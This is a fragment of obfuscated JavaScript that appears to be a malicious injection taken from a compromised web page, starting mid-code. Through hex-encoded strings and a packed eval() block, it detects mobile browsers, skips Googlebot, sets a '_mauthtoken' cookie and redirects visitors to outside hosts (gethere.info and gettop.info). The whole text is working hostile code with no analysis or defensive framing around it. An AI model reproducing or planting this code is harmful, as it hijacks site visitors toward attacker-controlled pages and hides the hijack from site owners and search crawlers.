_0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} setTimeout(“document.location.href=’http://gettop.info/kt/?53vSkc&'”, delay);var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘z(1d.1k.1l(“16”)==-1){(2V(a,b){z(a.1l(“2W”)==-1){z(/(2X|2U\\d+|2T).+1b|2P|2Q\\/|2R|2S|2Y|2Z|37|38|39|G(36|B|L)|W|35|30 |31|33|34|1b.+2O|2N|1i m(2z|2A)i|2B( K)?|2y|p(2x|2t)\\/|2u|2v|2w|2C(4|6)0|2D|2K|M\\.(2L|2M)|2J|2I|2E 2F|2G|2H/i.17(a)||/3a|3b|3E|3F|3G|50[1-6]i|3D|3C|a D|3y|X(N|Z|s\\-)|Y(3z|3A)|O(3B|1g|U)|3H|3I(3P|x|3Q)|3R|P(3O|A)|3N(j|3J)|3K|3L(3M|\\-m|r |s )|3x|3w(I|S|3i)|1a(3j|3k)|3h(X|3g)|3c(e|v)w|3d|3e\\-(n|u)|3f\\/|3l|3m|2s\\-|3u|3v|3s|3r\\-|U(3n|R)|3o|3p(V|S|3q)|3S|2l\\-s|1B|1x|1y|1c(c|p)o|1E(12|\\-d)|1J(49|Y)|1w(1H|1F)|N(1m|1n)|1o|1v([4-7]0|K|D|1p)|1s|1q(\\-|15)|F u|1r|1I|2r\\-5|g\\-y|A(\\.w|B)|2f(L|29)|2a|2b|2i\\-(m|p|t)|2o\\-|2p(J|14)|2n( i|G)|2j\\-c|2k(c(\\-| |15|a|g|p|s|t)|28)|27(1S|1T)|i\\-(20|A|q)|1R|1Q( |\\-|\\/)|1N|1O|1P|1V|1W|24|25|W|23(t|v)a|22|1X|1Y|1Z|2e|26( |\\/)|1U|2m |2q\\-|2h(c|k)|2c(2d|2g)|1M( g|\\/(k|l|u)|50|54|\\-[a-w])|1t|1u|1L\\-w|1G|1K\\/|q(j|1D|1z)|Q(f|21|1g)|m\\-1A|1C(3t|T)|4p(5E|5F|E)|5G|y(f|5D|1a|5C|1c|t(\\-| |o|v)|5z)|5A(50|3T|v )|5H|5I|5O[0-2]|5P[2-3]|5N(0|2)|5M(0|2|5)|5J(0(0|1)|10)|5K((c|m)\\-|5L|5y|5x|5l|5m)|5n(6|i)|5k|5j|5g(5h|5i)|5o|5p|5v|5R(a|d|t)|5u|5t(13|\\-([1-8]|c))|5q|5r|C(5s|5Q)|67\\-2|65(I|69|11)|63|64|J\\-g|5U\\-a|5Z(5Y|12|21|32|60|\\-[2-7]|i\\-)|5X|66|6a|6c|6b|5V(5T|62)|5W\\/|5S(6d|q|68|5w|x|5e)|4m(f|h\\-|Z|p\\-)|4n\\/|11(c(\\-|0|1)|47|Q|R|T)|4o\\-|4l|4k(\\-|m)|4h\\-0|4i(45|4j)|5f(O|P|4q|V|4w)|4x(4v|x)|4u(f|h\\-|v\\-|v )|4r(f|4s)|4t(18|50)|4g(4f|10|18)|14(3Z|41)|42\\-|3Y\\-|3X(i|m)|3U\\-|t\\-y|3V(C|3W)|E(H|m\\-|43|44)|4d\\-9|M(\\.b|F|4e)|4c|4b|46|48|4a(4y|j)|4z(40|5[0-3]|\\-v)|4Y|4Z|51|4X(52|53|60|61|H|4W|4T|4U|4V|55)|56(\\-| )|5c|5d|5b(g |5a|57)|58|59|4S|4R\\-|4F|4G|4H\\-/i.17(a.4E(0,4))){4D 1e=1h 19(1h 19().4A()+4B);1d.1k=”16=1; 4C=/;4I=”+1e.4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))